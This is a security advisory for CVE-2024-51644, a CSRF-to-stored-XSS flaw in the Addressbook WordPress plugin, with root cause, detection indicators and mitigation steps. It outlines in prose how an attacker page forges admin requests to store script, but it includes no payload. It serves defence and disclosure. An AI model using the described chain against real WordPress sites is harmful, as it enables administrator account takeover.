CVE-2024-51644 Overview
CVE-2024-51644 is a Cross-Site Request Forgery (CSRF) vulnerability [CWE-352] in the samwilson Addressbook WordPress plugin. The flaw affects all versions of Addressbook up to and including 1.1.3. An attacker can chain the CSRF weakness into a Stored Cross-Site Scripting (XSS) attack against authenticated administrators. Successful exploitation requires user interaction, such as enticing a logged-in administrator to visit an attacker-controlled page. The injected script persists in the application and executes in the browser of any user who later views the affected page.
Critical Impact
An unauthenticated attacker can trick an authenticated WordPress administrator into submitting a forged request that stores malicious JavaScript, leading to session compromise and administrative account takeover.
Affected Products
- samwilson Addressbook WordPress plugin
- All versions through 1.1.3
- WordPress sites running the vulnerable plugin
Discovery Timeline
- 2024-11-19 - CVE-2024-51644 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2024-51644
Vulnerability Analysis
The Addressbook plugin fails to validate the origin of state-changing HTTP requests. WordPress provides a nonce-based anti-CSRF mechanism through wp_nonce_field() and check_admin_referer(), but the affected plugin endpoints do not enforce these checks. This omission allows attackers to craft malicious HTML or JavaScript that submits requests on behalf of an authenticated administrator. Because the same request handlers also accept attacker-controlled input that is later rendered without proper output encoding, the CSRF becomes a vehicle for persistent script injection. The stored payload executes whenever an administrator or other user views the affected address book entry.
Root Cause
The root cause is the absence of CSRF token validation on plugin form submissions, combined with insufficient sanitization and output encoding of stored data. Both controls must be present to prevent the chain. The single CWE assigned is [CWE-352] (Cross-Site Request Forgery), reflecting the initial attack primitive.
Attack Vector
The attack is network-reachable and requires the targeted administrator to interact with attacker-controlled content. A typical exploitation flow involves the attacker hosting a page containing a hidden form or fetch request that targets the plugin's administrative endpoint. When an authenticated administrator visits the page, the browser automatically sends valid session cookies with the forged request. The plugin processes the request and stores the attacker's JavaScript payload. The payload executes in the context of the WordPress admin session on subsequent page views.
No verified public exploit code is available. See the Patchstack WordPress Vulnerability Report for additional technical context.
Detection Methods for CVE-2024-51644
Indicators of Compromise
- Unexpected <script>, onerror, or onload strings present in Addressbook plugin database tables or entries.
- WordPress admin sessions exhibiting outbound requests to unknown external domains after viewing address book pages.
- New or modified administrator accounts created shortly after an administrator accessed the address book interface.
- Referer headers in web server logs showing administrators arriving at plugin endpoints from external, untrusted origins.
Detection Strategies
- Review WordPress database tables associated with the Addressbook plugin for HTML or JavaScript content in fields intended to hold plain text.
- Inspect web server access logs for POST requests to plugin endpoints lacking valid _wpnonce parameters or with external Referer headers.
- Deploy a web application firewall (WAF) rule set that flags submissions to WordPress admin endpoints originating from cross-origin contexts.
- Use file integrity monitoring on the wp-content/plugins/addressbook/ directory to detect tampering.
Monitoring Recommendations
- Aggregate WordPress audit logs and alert on administrator actions that occur within seconds of external page visits.
- Monitor browser console errors and Content Security Policy (CSP) violation reports for blocked inline script executions on admin pages.
- Track plugin version inventory across WordPress installations to identify hosts still running Addressbook 1.1.3 or earlier.
How to Mitigate CVE-2024-51644
Immediate Actions Required
- Deactivate the Addressbook plugin on any WordPress site running version 1.1.3 or earlier until a patched release is verified.
- Audit existing address book entries and database records for stored JavaScript payloads and remove malicious content.
- Force password resets and re-authentication for all WordPress administrator accounts that may have been targeted.
- Review user roles and remove unauthorized accounts created during the exposure window.
Patch Information
No fixed version is identified in the NVD record at the time of publication. The advisory states the issue affects Addressbook through <= 1.1.3. Consult the Patchstack WordPress Vulnerability Report for the latest remediation guidance and replace the plugin if no maintained update is released.
Workarounds
- Remove or replace the Addressbook plugin with an actively maintained alternative that enforces WordPress nonce validation.
- Enforce a strict Content Security Policy that disallows inline scripts on the WordPress admin interface to limit XSS payload execution.
- Require administrators to use separate browsers or browser profiles for WordPress administration to reduce cross-site request exposure.
- Deploy a WAF rule to block POST requests to plugin endpoints that lack a valid same-origin Referer or WordPress nonce.
# Configuration example: disable the vulnerable plugin via WP-CLI
wp plugin deactivate addressbook
wp plugin delete addressbook
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
